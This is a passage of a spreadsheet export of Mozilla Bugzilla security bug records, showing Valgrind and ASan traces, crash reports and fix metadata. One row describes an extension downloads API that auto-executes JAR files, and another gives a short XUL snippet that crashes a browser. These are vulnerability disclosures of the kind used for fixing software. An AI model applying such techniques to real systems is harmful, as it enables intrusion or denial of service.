   by 0x700FCD7: mozilla::TransportFlow::PacketReceived(mozilla::TransportLayer*, unsigned char const*, unsigned long) (sigslot.h:2477)
   by 0x5891FC7: sigslot::_connection3&lt;mozilla::MediaPipeline, mozilla::TransportLayer*, unsigned char const*, unsigned long, sigslot::single_threaded&gt;::emit(mozilla::TransportLayer*, unsigned char const*, unsigned long) (sigslot.h:1944)
   by 0x70185CD: sigslot::signal3&lt;mozilla::TransportLayer*, unsigned char const*, unsigned long, sigslot::single_threaded&gt;::operator()(mozilla::TransportLayer*, unsigned char const*, unsigned long) (sigslot.h:2477)
Use of uninitialised value of size 8
   at 0x58422D8: sctp_calculate_cksum (sctp_crc32.c:558)
   by 0x585F821: sctp_lowlevel_chunk_output (sctp_output.c:4808)
   by 0x586B084: sctp_send_initiate_ack (sctp_output.c:6295)
   by 0x584BE38: sctp_handle_init (sctp_input.c:217)
   by 0x5851BA8: sctp_process_control (sctp_input.c:4887)
   by 0x5855EE9: sctp_common_input_processing (sctp_input.c:5907)
   by 0x5891E30: usrsctp_conninput (user_socket.c:3189)
   by 0x58929E6: mozilla::DataChannelConnection::SctpDtlsInput(mozilla::TransportFlow*, unsigned char const*, unsigned long) (DataChannel.cpp:654)
   by 0x5891FC7: sigslot::_connection3&lt;mozilla::MediaPipeline, mozilla::TransportLayer*, unsigned char const*, unsigned long, sigslot::single_threaded&gt;::emit(mozilla::TransportLayer*, unsigned char const*, unsigned long) (sigslot.h:1944)
   by 0x700FCD7: mozilla::TransportFlow::PacketReceived(mozilla::TransportLayer*, unsigned char const*, unsigned long) (sigslot.h:2477)
   by 0x5891FC7: sigslot::_connection3&lt;mozilla::MediaPipeline, mozilla::TransportLayer*, unsigned char const*, unsigned long, sigslot::single_threaded&gt;::emit(mozilla::TransportLayer*, unsigned char const*, unsigned long) (sigslot.h:1944)
   by 0x70185CD: sigslot::signal3&lt;mozilla::TransportLayer*, unsigned char const*, unsigned long, sigslot::single_threaded&gt;::operator()(mozilla::TransportLayer*, unsigned char const*, unsigned long) (sigslot.h:2477)
 Uninitialised value was created by a stack allocation
   at 0x586A486: sctp_send_initiate_ack (sctp_output.c:5652)
(and a whole bunch more of the above, followed by a bunch of the following)
Use of uninitialised value of size 8
   at 0x115788E4: rijndael_encryptBlock128 (rijndael.c:577)
   by 0x11579458: rijndael_encryptCBC (rijndael.c:875)
   by 0x11579F13: AES_Encrypt (rijndael.c:1237)
   by 0x17B1269A: NSC_EncryptUpdate (pkcs11c.c:1000)
   by 0x4CD04C9: PK11_CipherOp (pk11cxt.c:700)
   by 0x4DDE1D8: ssl3_CompressMACEncryptRecord (ssl3con.c:2424)
   by 0x4DDAD82: dtls_CompressMACEncryptRecord (dtlscon.c:803)
   by 0x4DDE590: ssl3_SendRecord (ssl3con.c:2635)
   by 0x4DDE956: ssl3_SendApplicationData (ssl3con.c:2775)
   by 0x4DEE1C2: ssl_SecureSend (sslsecur.c:1304)
   by 0x4DF0BB1: ssl_Send (sslsock.c:2139)
   by 0x4C49868: PR_Send (priometh.c:194)
 Uninitialised value was created by a stack allocation
   at 0x586A486: sctp_send_initiate_ack (sctp_output.c:5652)</t>
        </is>
      </c>
      <c r="X673" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="674">
      <c r="A674" t="n">
        <v>1328861</v>
      </c>
      <c r="B674" t="inlineStr">
        <is>
          <t>2017-01-05 04:37:15 -0800</t>
        </is>
      </c>
      <c r="C674" t="inlineStr">
        <is>
          <t>Crash in arena_dalloc | mozilla::binding_danger::TErrorResult&lt;T&gt;::ClearDOMExceptionInfo</t>
        </is>
      </c>
      <c r="D674" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E674" t="n">
        <v>1</v>
      </c>
      <c r="F674" t="n">
        <v>1</v>
      </c>
      <c r="G674" t="n">
        <v>3</v>
      </c>
      <c r="H674" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I674" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J674" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K674" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L674" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M674" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N674" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O674" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P674" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main52+][adv-esr45.8+]</t>
        </is>
      </c>
      <c r="Q674" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R674" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S674" t="inlineStr">
        <is>
          <t>mozilla54</t>
        </is>
      </c>
      <c r="T674" t="n">
        <v>1</v>
      </c>
      <c r="U674" t="n">
        <v>0</v>
      </c>
      <c r="V674" t="n">
        <v>37</v>
      </c>
      <c r="W674" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-57766b22-bc36-42be-b8b0-e60982170105.
=============================================================
This is a blank Firefox profile I created to create a clean report of this bug. Steps to reproduce (happens every time):
1. Install Zotero for Firefox 4.0.29.16 from https://www.zotero.org/download/
2. Install YesScript 2.2 from addons.mozilla.org
3. Restart Firefox
4. Go to www.google.com
5. Click the YesScript blacklist button
6. Press F5 to refresh page
7. Firefox crashes.
Platform: Ubuntu 16.04 64-bit. Firefox 50.1.0.
Cross-reported to both YesScript and Zotero:
* https://github.com/JasonBarnabe/yesscript/issues/13
* https://forums.zotero.org/discussion/63733/854545803-firefox-crashes-when-addons-yesscript-and-zotero-are-both-installed
Not sure I would classify this as critical severity, but that is what the reporting tool defaulted to.</t>
        </is>
      </c>
      <c r="X674" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="675">
      <c r="A675" t="n">
        <v>367077</v>
      </c>
      <c r="B675" t="inlineStr">
        <is>
          <t>2007-01-15 16:25:41 -0800</t>
        </is>
      </c>
      <c r="C675" t="inlineStr">
        <is>
          <t>Big attachments which should be stored locally are not</t>
        </is>
      </c>
      <c r="D675" t="inlineStr">
        <is>
          <t>2007-01-16 14:50:20 -0800</t>
        </is>
      </c>
      <c r="E675" t="n">
        <v>1</v>
      </c>
      <c r="F675" t="n">
        <v>1</v>
      </c>
      <c r="G675" t="n">
        <v>4</v>
      </c>
      <c r="H675" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I675" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J675" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K675" t="inlineStr">
        <is>
          <t>2.23.3</t>
        </is>
      </c>
      <c r="L675" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M675" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N675" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O675" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P675" t="inlineStr"/>
      <c r="Q675" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R675" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S675" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T675" t="n">
        <v>1</v>
      </c>
      <c r="U675" t="n">
        <v>0</v>
      </c>
      <c r="V675" t="n">
        <v>5</v>
      </c>
      <c r="W675" t="inlineStr">
        <is>
          <t>If you turn on the "BigFile" attribute, _validate_data() returns 0 as we don't want to fill the DB with the content of the attachment:
$data = _validate_data($throw_error, $hr_vars) || return 0;
But this means that |return 0| is called and we leave Attachment::insert_attachment_for_bug() before we had a chance to save the attachment in data/attachments/.
This is a regression due to bug 5179.</t>
        </is>
      </c>
      <c r="X675" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="676">
      <c r="A676" t="n">
        <v>1346515</v>
      </c>
      <c r="B676" t="inlineStr">
        <is>
          <t>2017-03-11 02:49:02 -0800</t>
        </is>
      </c>
      <c r="C676" t="inlineStr">
        <is>
          <t>browser.downloads addon feature may be used for RCE</t>
        </is>
      </c>
      <c r="D676" t="inlineStr">
        <is>
          <t>2024-05-30 09:30:13 -0700</t>
        </is>
      </c>
      <c r="E676" t="n">
        <v>1</v>
      </c>
      <c r="F676" t="n">
        <v>1</v>
      </c>
      <c r="G676" t="n">
        <v>3</v>
      </c>
      <c r="H676" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I676" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J676" t="inlineStr">
        <is>
          <t>Untriaged</t>
        </is>
      </c>
      <c r="K676" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L676" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M676" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N676" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O676" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P676" t="inlineStr">
        <is>
          <t>[adv-main56+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q676" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R676" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S676" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T676" t="n">
        <v>0</v>
      </c>
      <c r="U676" t="n">
        <v>0</v>
      </c>
      <c r="V676" t="n">
        <v>21</v>
      </c>
      <c r="W676" t="inlineStr">
        <is>
          <t>Created attachment 8846267
poc.zip
User Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Steps to reproduce:
I was fiddling with the download feature of webextensions and I noticed you can download and open any files. Of course, immediately I tried executables only to be hit with windows protection. 
However, it seems like JAR files have been overlooked. 
1. Go to 'about:debugging'
2. Unpack attached PoC somewhere
3. Back in 'about:debugging' choose 'Load temp addon' and choose the poc
4. jar file is automatically downloaded and executed.
Actual results:
We are able to download and execute jar files automatically. As you can imagine this is not good.
Expected results:
Jar file should have been blocked from auto executing.</t>
        </is>
      </c>
      <c r="X676" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="677">
      <c r="A677" t="n">
        <v>287308</v>
      </c>
      <c r="B677" t="inlineStr">
        <is>
          <t>2005-03-22 19:11:27 -0800</t>
        </is>
      </c>
      <c r="C677" t="inlineStr">
        <is>
          <t>element with not correctly resolved context attribute crashes mozilla on window close [@ nsPopupSetFrame::DoLayout ]</t>
        </is>
      </c>
      <c r="D677" t="inlineStr">
        <is>
          <t>2011-06-09 14:58:41 -0700</t>
        </is>
      </c>
      <c r="E677" t="n">
        <v>1</v>
      </c>
      <c r="F677" t="n">
        <v>1</v>
      </c>
      <c r="G677" t="n">
        <v>3</v>
      </c>
      <c r="H677" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I677" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J677" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K677" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L677" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M677" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N677" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O677" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P677" t="inlineStr"/>
      <c r="Q677" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R677" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S677" t="inlineStr">
        <is>
          <t>mozilla1.8beta2</t>
        </is>
      </c>
      <c r="T677" t="n">
        <v>1</v>
      </c>
      <c r="U677" t="n">
        <v>0</v>
      </c>
      <c r="V677" t="n">
        <v>12</v>
      </c>
      <c r="W677" t="inlineStr">
        <is>
          <t>The following XUL code crashes Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.8b2) Gecko/20050319 Firefox/1.0+ but not Firefox 1.0.x. It also crashes
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050305
&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;?xml-stylesheet href="chrome://global/skin/" type="text/css"?&gt;
&lt;window xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"&gt;
  &lt;menubar&gt;
    &lt;menu&gt;
      &lt;menupopup id="mypopup"&gt;
        &lt;menuitem label="Test"/&gt;
      &lt;/menupopup&gt;
    &lt;/menu&gt;
  &lt;/menubar&gt;
  &lt;label value="Right-click me!" context="mypopup"/&gt;
&lt;/window&gt;
To reproduce, load this in the browser and right-click the label. Even if the
popup had children, it wouldn't show (not sure that is correct) and when closing
the window, browser crashes.
The key here is 
1) to put &lt;menupopup/&gt; in a place where it wouldn't be "found" by context
property. Note that if you remove it altogether, the crash doesn't occur.
2) to use context, not menucontext on &lt;label/&gt;. From my limited testing,
menucontext works relatively fine with this (that is not crashes, while still
not showing the popup).
I'm not able to track down the regression, the only thing I can say it happens
with 20050128 build, the earliest Firefox trunk build I installed on my system.
Talkback has never worked for me, so someone else will have to submit the report
if it is needed. The bug is reproducible for me on a clean profile for me, so it
shouldn't be much of a trouble.
Not sure if it should go here, in Menus or in a completely separate place.</t>
        </is>
      </c>
      <c r="X677" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="678">
      <c r="A678" t="n">
        <v>134787</v>
      </c>
      <c r="B678" t="inlineStr">
        <is>
          <t>2002-04-01 19:59:30 -0800</t>
        </is>
      </c>
      <c r="C678" t="inlineStr">
        <is>
          <t>[XBLFC] Active Accessibility: support XBL-based HTML form controls</t>
        </is>
      </c>
      <c r="D678" t="inlineStr">
        <is>
          <t>2019-05-03 14:53:04 -0700</t>
        </is>
      </c>
      <c r="E678" t="n">
        <v>1</v>
      </c>
      <c r="F678" t="n">
        <v>1</v>
      </c>
      <c r="G678" t="n">
        <v>3</v>
      </c>
      <c r="H678" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I678" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J678" t="inlineStr">
        <is>
          <t>Disability Access APIs</t>
        </is>
      </c>
      <c r="K678" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L678" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M678" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N678" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O678" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P678" t="inlineStr">
        <is>
          <t>[ADT3 RTM] - marking same as general XBLFC (57209)</t>
        </is>
      </c>
      <c r="Q678" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R678" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S678" t="inlineStr">
        <is>
          <t>mozilla1.1alpha</t>
        </is>
      </c>
      <c r="T678" t="n">
        <v>1</v>
      </c>
      <c r="U678" t="n">
        <v>0</v>
      </c>
      <c r="V678" t="n">
        <v>8</v>
      </c>
      <c r="W678" t="inlineStr">
        <is>
          <t>Bug 57209 is Brian Ryner's bugs to implement HTML form controls in XBL.
This bug is to get the same MSAA support we have form the old HTML form controls
with these new form controls.</t>
        </is>
      </c>
      <c r="X678" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="679">
      <c r="A679" t="n">
        <v>1747526</v>
      </c>
      <c r="B679" t="inlineStr">
        <is>
          <t>2021-12-23 22:56:17 -0800</t>
        </is>
      </c>
      <c r="C679" t="inlineStr">
        <is>
          <t>heap-use-after-free of TaskController</t>
        </is>
      </c>
      <c r="D679" t="inlineStr">
        <is>
          <t>2024-07-11 23:14:20 -0700</t>
        </is>
      </c>
      <c r="E679" t="n">
        <v>1</v>
      </c>
      <c r="F679" t="n">
        <v>1</v>
      </c>
      <c r="G679" t="n">
        <v>3</v>
      </c>
      <c r="H679" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I679" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J679" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K679" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L679" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M679" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N679" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O679" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P679" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main98+]</t>
        </is>
      </c>
      <c r="Q679" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R679" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S679" t="inlineStr">
        <is>
          <t>99 Branch</t>
        </is>
      </c>
      <c r="T679" t="n">
        <v>1</v>
      </c>
      <c r="U679" t="n">
        <v>0</v>
      </c>
      <c r="V679" t="n">
        <v>19</v>
      </c>
      <c r="W679" t="inlineStr">
        <is>
          <t>Tested Version: Ubuntu 64-bit memory 5G + linux64-fuzzing-asan-opt(95.0.1 (64-bit))
[App]
Vendor=Mozilla
Name=Firefox
RemotingName=firefox
CodeName=Nightly
Version=95.0.1
BuildID=20211213184707
SourceStamp=e1e02ca86a8e08d28a750053f51cc30ed144fbb8
ID={ec8030f7-c20a-464f-9b0e-13a3a9e97384}
[Gecko]
MinVersion=95.0.1
MaxVersion=95.0.1
[XRE]
EnableProfileMigrator=1
There is no way to reproduce the vulnerability, temporarily can not provide poc samples,I feel that this is a conditional competition vulnerability，The conditions for triggering this vulnerability are demanding, it needs to be based on a very poorly performing environment in order to trigger the vulnerability.the crash report is as follows:
```
==ERROR: AddressSanitizer: heap-use-after-free on address 0x6040014e2570 at pc 0x7f72b5aaff3c bp 0x7f729053c4b0 sp 0x7f729053c4a8
READ of size 8 at 0x6040014e2570 thread T57 (MediaTimer #1)
==588784==WARNING: Can't create a socket pair to start external symbolizer (errno: 24)
==588784==WARNING: Can't create a socket pair to start external symbolizer (errno: 24)
==588784==WARNING: Can't create a socket pair to start external symbolizer (errno: 24)
==588784==WARNING: Can't create a socket pair to start external symbolizer (errno: 24)
==588784==WARNING: Can't create a socket pair to start external symbolizer (errno: 24)
==588784==WARNING: Failed to use and restart external symbolizer!
#0 0x7f72b5aaff3b in mozilla::Task::PriorityCompare::operator()(RefPtr&lt;mozilla::Task&gt; const&amp;, RefPtr&lt;mozilla::Task&gt; const&amp;) const /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:286
#1 0x7f72b5aaff3b in operator-&gt; /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:316
#2 0x7f72b5aaff3b in operator() /builds/worker/workspace/obj-build/dist/include/mozilla/TaskController.h:160
#3 0x7f72b5aafc91 in std::_Rb_tree&lt;RefPtr&lt;mozilla::Task&gt;, RefPtr&lt;mozilla::Task&gt;, std::_Identity&lt;RefPtr&lt;mozilla::Task&gt; &gt;, mozilla::Task::PriorityCompare, std::allocator&lt;RefPtr&lt;mozilla::Task&gt; &gt; &gt;::_M_get_insert_unique_pos(RefPtr&lt;mozilla::Task&gt; const&amp;) /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_tree.h:2038
#4 0x7f72b5a708ef in mozilla::TaskController::AddTask(already_AddRefed&lt;mozilla::Task&gt;&amp;&amp;) /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_tree.h:2091
#5 0x7f72b5a708ef in insert /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_set.h:511
#6 0x7f72b5a708ef in AddTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:357
#7 0x7f72b5a72422 in mozilla::TaskController::DispatchRunnable(already_AddRefed&lt;nsIRunnable&gt;&amp;&amp;, unsigned int, mozilla::TaskManager*) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:504
#8 0x7f72b5a598e2 in mozilla::detail::EventQueueInternal&lt;16ul&gt;::PutEvent(already_AddRefed&lt;nsIRunnable&gt;&amp;&amp;, mozilla::EventQueuePriority, mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;, mozilla::BaseTimeDuration&lt;mozilla::TimeDurationValueCalculator&gt;*) /builds/worker/checkouts/gecko/xpcom/threads/EventQueue.cpp:55
#9 0x7f72b5a7a20d in mozilla::ThreadEventQueue::PutEventInternal(already_AddRefed&lt;nsIRunnable&gt;&amp;&amp;, mozilla::EventQueuePriority, mozilla::ThreadEventQueue::NestedSink*) /builds/worker/checkouts/gecko/xpcom/threads/ThreadEventQueue.cpp:121
#10 0x7f72b5a7c168 in mozilla::ThreadEventTarget::Dispatch(already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/ThreadEventTarget.cpp:97
#11 0x7f72b5a892a5 in NS_DispatchToMainThread(already_AddRefed&lt;nsIRunnable&gt;&amp;&amp;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:229
#12 0x7f72b5a6492a in mozilla::SchedulerGroup::InternalUnlabeledDispatch(mozilla::TaskCategory, already_AddRefed&lt;mozilla::SchedulerGroup::Runnable&gt;&amp;&amp;) /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:92
#13 0x7f72b5a64706 in mozilla::SchedulerGroup::LabeledDispatch(mozilla::TaskCategory, already_AddRefed&lt;nsIRunnable&gt;&amp;&amp;, mozilla::PerformanceCounter*) /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:77
#14 0x7f72b5a9f351 in nsThreadPool::ShutdownThread(nsIThread*) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:166
#15 0x7f72b5aa02e5 in nsThreadPool::Run() /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:319
#16 0x7f72b5a929f4 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1169
#17 0x7f72b5a9c6ec in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467
#18 0x7f72b6f23e0d in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300
#19 0x7f72b6dae1f1 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331
#20 0x7f72b6dae1f1 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
#21 0x7f72b6dae1f1 in Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
#22 0x7f72b5a8bd7b in nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:391
#23 0x7f72d120609e in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201
#24 0x7f72d2b26608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477
#25 0x7f72d26ee292 in clone ??:?
0x6040014e2570 is located 32 bytes inside of 40-byte region [0x6040014e2550,0x6040014e2578)
freed by thread T0 (Web Content) here:
#0 0x55bb39784cb2 in free _asan_rtl_
#1 0x7f72b5a56daa in std::_Rb_tree&lt;RefPtr&lt;mozilla::Task&gt;, RefPtr&lt;mozilla::Task&gt;, std::_Identity&lt;RefPtr&lt;mozilla::Task&gt; &gt;, mozilla::Task::PriorityCompare, std::allocator&lt;RefPtr&lt;mozilla::Task&gt; &gt; &gt;::_M_erase(std::_Rb_tree_node&lt;RefPtr&lt;mozilla::Task&gt; &gt;*) /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:51
#2 0x7f72b5a56daa in deallocate /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/ext/new_allocator.h:125
#3 0x7f72b5a56daa in deallocate /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/alloc_traits.h:462
#4 0x7f72b5a56daa in _M_put_node /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_tree.h:592
#5 0x7f72b5a56daa in _M_drop_node /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_tree.h:659
#6 0x7f72b5a56daa in _M_erase /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_tree.h:1858
#7 0x7f72b5a56d7f in std::_Rb_tree&lt;RefPtr&lt;mozilla::Task&gt;, RefPtr&lt;mozilla::Task&gt;, std::_Identity&lt;RefPtr&lt;mozilla::Task&gt; &gt;, mozilla::Task::PriorityCompare, std::allocator&lt;RefPtr&lt;mozilla::Task&gt; &gt; &gt;::_M_erase(std::_Rb_tree_node&lt;RefPtr&lt;mozilla::Task&gt; &gt;*) /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_tree.h:1856
#8 0x7f72b5a56d7f in std::_Rb_tree&lt;RefPtr&lt;mozilla::Task&gt;, RefPtr&lt;mozilla::Task&gt;, std::_Identity&lt;RefPtr&lt;mozilla::Task&gt; &gt;, mozilla::Task::PriorityCompare, std::allocator&lt;RefPtr&lt;mozilla::Task&gt; &gt; &gt;::_M_erase(std::_Rb_tree_node&lt;RefPtr&lt;mozilla::Task&gt; &gt;*) /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_tree.h:1856
#9 0x7f72b5a56d7f in std::_Rb_tree&lt;RefPtr&lt;mozilla::Task&gt;, RefPtr&lt;mozilla::Task&gt;, std::_Identity&lt;RefPtr&lt;mozilla::Task&gt; &gt;, mozilla::Task::PriorityCompare, std::allocator&lt;RefPtr&lt;mozilla::Task&gt; &gt; &gt;::_M_erase(std::_Rb_tree_node&lt;RefPtr&lt;mozilla::Task&gt; &gt;*) /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_tree.h:1856
#10 0x7f72b5a56d7f in std::_Rb_tree&lt;RefPtr&lt;mozilla::Task&gt;, RefPtr&lt;mozilla::Task&gt;, std::_Identity&lt;RefPtr&lt;mozilla::Task&gt; &gt;, mozilla::Task::PriorityCompare, std::allocator&lt;RefPtr&lt;mozilla::Task&gt; &gt; &gt;::_M_erase(std::_Rb_tree_node&lt;RefPtr&lt;mozilla::Task&gt; &gt;*) /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_tree.h:1856
#11 0x7f72b5a56d7f in std::_Rb_tree&lt;RefPtr&lt;mozilla::Task&gt;, RefPtr&lt;mozilla::Task&gt;, std::_Identity&lt;RefPtr&lt;mozilla::Task&gt; &gt;, mozilla::Task::PriorityCompare, std::allocator&lt;RefPtr&lt;mozilla::Task&gt; &gt; &gt;::_M_erase(std::_Rb_tree_node&lt;RefPtr&lt;mozilla::Task&gt; &gt;*) /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_tree.h:1856
#12 0x7f72b5ab0284 in mozilla::TaskController::~TaskController() /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_tree.h:949
#13 0x7f72b5ab0284 in ~set /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/stl_set.h:271
#14 0x7f72b5ab0284 in ~TaskController /builds/worker/workspace/obj-build/dist/include/mozilla/TaskController.h:270
